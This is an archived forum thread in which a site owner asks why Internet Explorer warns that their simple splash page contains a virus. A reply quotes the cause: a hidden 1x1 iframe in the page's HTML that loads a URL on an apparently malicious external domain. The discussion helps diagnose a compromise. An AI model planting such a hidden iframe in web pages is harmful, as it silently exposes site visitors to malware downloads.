PDA

View Full Version : Site I made has a virus in IE?



Syous
January 22nd, 2008, 12:12 AM
So I have a splash page for a site http://www.barefacedtech.com (http://www.barefacedtech.com/)

Some people get a prompt in Internet Explorer saying the site contains a virus, but the site is simply 1 one html file with the .swf

Any ideas?

Syous
January 22nd, 2008, 10:17 PM
Bump~

zemm
January 22nd, 2008, 11:24 PM
You have the line:

<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>

in your HTML which appears to be a virus from the minimal googling I've done. Check your own computer!

Syous
January 23rd, 2008, 12:16 AM
Hmmm, that's very odd indeed. Wonder how the heck that got there!